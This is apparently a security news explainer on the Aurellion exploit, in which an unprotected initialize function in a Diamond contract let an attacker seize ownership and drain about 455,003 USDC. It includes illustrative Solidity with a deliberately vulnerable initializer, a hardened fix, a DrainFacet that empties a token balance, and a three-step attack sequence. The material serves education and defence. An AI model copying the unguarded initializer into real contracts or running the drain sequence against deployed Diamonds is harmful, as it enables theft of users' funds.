Aurellion Exploit Drains About 455,003 USDC Through Diamond Contract Flaw

According to SlowMist, an unprotected initialize(address) function in Aurellion Labs-related Diamond contracts enabled a reentrant ownership takeover, malicious Facet injection, and the theft of about 455,003 USDC.


Summary

Aurellion suffered an exploit that drained about 455,003 USDC. According to SlowMist, the initialize(address) function in the SafeOwnable Facet was unprotected: it could be called again after deployment, and the attacker re-invoked it (SlowMist describes this as reentrant initialization) to overwrite the owner of the Diamond contract. With ownership in hand, the attacker passed the owner check on diamondCut and added a malicious Facet exposing a pullERC20 function, then used that function to move the USDC out of the contract. The case shows how a missing one-shot guard on an initializer in a modular smart contract system escalates directly to ownership compromise and fund theft, because every later privilege in a Diamond (including the ability to add code) hangs off the stored owner.

Terms & Concepts
  • Diamond contract: A modular smart contract architecture that separates logic into multiple Facets, allowing upgrades and feature changes without replacing the core contract.
  • Facet: A contract module in Diamond architecture that provides specific functions and can be added, replaced, or removed through upgrades.
  • diamondCut: The upgrade function of the EIP-2535 Diamond standard, used to add, replace, or remove Facets. Its only protection is normally the Diamond's owner check, so an attacker who has taken ownership can call it to inject malicious logic.
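The summary and the terms above describe one chain: an initializer that can be re-run rewrites the owner, the owner check on diamondCut then admits the attacker, and a freshly added Facet moves the tokens. The following is an added illustration of that bug class in a minimal Diamond, written for this page; it is not Aurellion's, SlowMist's, or any audited Diamond implementation's code. Every name in it (LibDiamond, MiniDiamond, VulnerableOwnableFacet, HardenedOwnableFacet, DiamondCutFacet, DrainFacet) is an assumption, and diamondCut is simplified to an add/replace-only variant without the EIP-2535 init call.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not Aurellion's or SlowMist's code. All contract and slot
// names below are assumptions chosen for this illustration.

interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
}

// Diamond storage: one struct at a fixed slot, shared by all facets via delegatecall.
library LibDiamond {
    bytes32 constant DIAMOND_SLOT = keccak256("example.mini.diamond.storage");

    struct Layout {
        address owner;
        bool initialized;                   // only the hardened facet uses this
        mapping(bytes4 => address) facets;  // selector -> facet that implements it
    }

    function layout() internal pure returns (Layout storage l) {
        bytes32 slot = DIAMOND_SLOT;
        assembly { l.slot := slot }
    }
}

// The proxy: every unknown selector is delegatecalled into its registered facet.
contract MiniDiamond {
    constructor(address cutFacet, address ownableFacet, address initialOwner) {
        LibDiamond.Layout storage l = LibDiamond.layout();
        l.facets[DiamondCutFacet.diamondCut.selector] = cutFacet;
        l.facets[bytes4(keccak256("initialize(address)"))] = ownableFacet;
        l.facets[bytes4(keccak256("owner()"))] = ownableFacet;
        // Run the facet's initializer once, in this contract's storage context.
        (bool ok, ) = ownableFacet.delegatecall(
            abi.encodeWithSignature("initialize(address)", initialOwner)
        );
        require(ok, "MiniDiamond: init failed");
    }

    fallback() external {
        address facet = LibDiamond.layout().facets[msg.sig];
        require(facet != address(0), "MiniDiamond: no facet for selector");
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), facet, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// The owner check here is the only thing between a caller and arbitrary code
// in the diamond, so whoever controls `owner` controls the whole contract.
contract DiamondCutFacet {
    struct FacetCut { address facetAddress; bytes4[] selectors; }

    function diamondCut(FacetCut[] calldata cuts) external {
        LibDiamond.Layout storage l = LibDiamond.layout();
        require(msg.sender == l.owner, "DiamondCut: not owner");
        for (uint256 i = 0; i < cuts.length; i++) {
            for (uint256 j = 0; j < cuts[i].selectors.length; j++) {
                l.facets[cuts[i].selectors[j]] = cuts[i].facetAddress;
            }
        }
    }
}

// VULNERABLE: no "already initialized" guard, so any caller can later invoke
// diamond.initialize(attacker) through the fallback and overwrite the owner.
contract VulnerableOwnableFacet {
    function initialize(address owner_) external {
        LibDiamond.layout().owner = owner_;
    }
    function owner() external view returns (address) { return LibDiamond.layout().owner; }
}

// HARDENED: one-shot initializer backed by a flag kept in diamond storage.
contract HardenedOwnableFacet {
    function initialize(address owner_) external {
        LibDiamond.Layout storage l = LibDiamond.layout();
        require(!l.initialized, "Ownable: already initialized");
        l.initialized = true;
        l.owner = owner_;
    }
    function owner() external view returns (address) { return LibDiamond.layout().owner; }
}

// What an attacker registers after the takeover: a facet that sends the
// diamond's whole balance of a token wherever the caller says.
contract DrainFacet {
    function pullERC20(address token, address to) external {
        IERC20 t = IERC20(token);
        require(t.transfer(to, t.balanceOf(address(this))), "DrainFacet: transfer failed");
    }
}

// Attack sequence against a MiniDiamond built with VulnerableOwnableFacet
// (three ordinary transactions from the attacker's address):
//   1. diamond.initialize(attacker)                        -> owner = attacker
//   2. diamond.diamondCut([{DrainFacet, [DrainFacet.pullERC20.selector]}])
//   3. diamond.pullERC20(token, attacker)                  -> balance leaves the diamond
// Built with HardenedOwnableFacet instead, step 1 reverts and the chain stops.
```

The fix is deliberately in the facet, not the proxy: because facets run via delegatecall, the `initialized` flag has to live in the shared diamond storage struct, and a guard held in a facet's own contract storage would never be consulted. A practical check for a deployed Diamond is to call its initialize selector from an unprivileged account and confirm it reverts; on a vulnerable deployment it silently succeeds, and at that point the owner check on diamondCut no longer protects anything.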